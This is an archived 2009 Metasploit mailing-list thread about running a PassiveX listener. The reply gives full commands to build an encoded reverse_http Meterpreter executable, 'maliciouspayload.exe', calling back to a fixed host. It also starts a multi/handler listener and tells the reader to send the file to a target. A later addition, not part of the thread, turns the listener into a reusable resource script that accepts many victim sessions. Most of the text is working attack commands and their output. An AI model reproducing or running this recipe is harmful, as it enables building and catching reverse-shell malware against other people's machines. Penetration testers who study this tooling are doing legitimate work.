Metasploit mailing list archives
Fwd: PassiveX Listener
From: mubix at room362.com (Rob Fuller)
Date: Wed, 10 Jun 2009 09:32:01 -0400
Damn you people and your strict RFC compliance... ;-)
--
Rob Fuller | Mubix | Room362.com | Hak5.org
---------- Forwarded message ----------
From: Rob Fuller <mubix at room362.com>
Date: Wed, Jun 10, 2009 at 9:11 AM
Subject: Re: [framework] PassiveX Listener
To: Jamie Penney <jamie.penney at gmail.com>
*Here are the options for msfpayload:*
Usage: ./msfpayload <payload> [var=val]
<S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>
*And msfencode's options, if you choose to use it as I demonstrate below.
However, encoding happens by default with msfpayload (IIRC):*
./msfencode -h
Usage: ./msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer with (c, elf, exe,
java, perl, raw, ruby, vba)
*Here we create the PassiveX payload. Note the PX options instead of the
LHOST/LPORT:*
./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=192.168.1.100 PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe
[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)
*Now that we have our "malicious payload" in /tmp we get our listener ready
(you can use msfcli as well, I just like msfconsole because it provides me
more flexibility):*
./msfconsole
(msfconsole ASCII-art banner)
=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux
msf > use multi/handler
msf exploit(handler) > exploit -h
*(I'm showing you 'exploit's options because a lot of people don't know they
exist.) With two lines you can start your listener (use, then exploit):*
Usage: exploit [options]
Launches an exploitation attempt.
OPTIONS:
-e <opt> The payload encoder to use. If none is specified, ENCODER is
used.
-h Help banner.
-j Run in the context of a job.
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index to use. If none is specified, TARGET is
used.
-z Do not interact with the session after successful
exploitation.
msf exploit(handler) > exploit -j -z -p windows/reflectivemeterpreter/reverse_http -o PXHOST=0.0.0.0,PXPORT=443,ExitOnSession=False
[*] Exploit running as background job.
msf exploit(handler) >
[*] PassiveX listener started.
[*] Starting the payload handler...
msf exploit(handler) >
*Listener ready to go. I chose IP: 0.0.0.0 just to make things easy. Just
send off maliciouspayload.exe to your target and you're set.*
Hope this helps,
--
Rob Fuller | Mubix | Room362.com | Hak5.org
On Wed, Jun 10, 2009 at 5:51 AM, Jamie Penney <jamie.penney at gmail.com> wrote:
Hi! Does anyone know off the top of their head how to run the PassiveX listener without actually sending any exploit? For example, if I use msfpayload piped to msfencode to create an .exe file containing the PassiveX stage 1 code and run this manually, I would need the listener to be running on the other end.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
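The same two-step listener setup Rob describes above, written as an msfconsole resource script so it can be restarted with one command instead of being retyped. This is an added example, not part of the original thread or of Metasploit itself; the file name handler.rc and the PXHOST/PXPORT values are assumptions (the bind address 0.0.0.0 and port 443 match the listener in the post, and the PXPORT must be the port the generated .exe was built with). It shows the `set` form that is equivalent to the `exploit -p ... -o ...` one-liner, and the two checks (`jobs`, `sessions -l`) you would run to confirm the handler is up and that a PassiveX stage has called back.

```text
# handler.rc -- assumed file name, added example (not from the original post).
# Run with: ./msfconsole -r handler.rc
#
# Equivalent to the one-liner in the post:
#   exploit -j -z -p windows/reflectivemeterpreter/reverse_http \
#           -o PXHOST=0.0.0.0,PXPORT=443,ExitOnSession=False

use multi/handler
set PAYLOAD windows/reflectivemeterpreter/reverse_http

# PassiveX uses PX* options instead of LHOST/LPORT.
# PXHOST here is the address the listener binds to; PXPORT must match
# the PXPORT baked into the .exe by msfpayload (443 in the post).
set PXHOST 0.0.0.0
set PXPORT 443

# Keep the handler alive after the first session so several hosts
# running the same .exe can all call back to this one listener.
set ExitOnSession false

# -j: run as a background job, -z: do not auto-interact with the session.
exploit -j -z

# Checks: the handler should appear as a running job, and each
# callback as a new session.
jobs
sessions -l
```

PXURI is left at its default (the post builds the payload with PXURI=/), so it does not need to be set on the handler side; if you change it when generating the .exe, set the same value here.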
Current thread:
- PassiveX Listener Jamie Penney (Jun 10)
- PassiveX Listener H D Moore (Jun 10)
- Fwd: PassiveX Listener Rob Fuller (Jun 10)
